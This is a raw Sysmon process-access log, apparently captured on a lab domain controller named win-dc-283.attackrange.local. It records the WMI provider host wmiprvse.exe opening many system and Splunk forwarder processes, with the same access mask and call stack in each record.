15:59:47.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028154Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028153Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028152Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.694{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028151Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028150Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028149Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028148Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028147Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028146Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028145Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028144Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028143Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028142Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028141Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028140Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028139Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028138Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028137Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028136Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:47.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028135Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 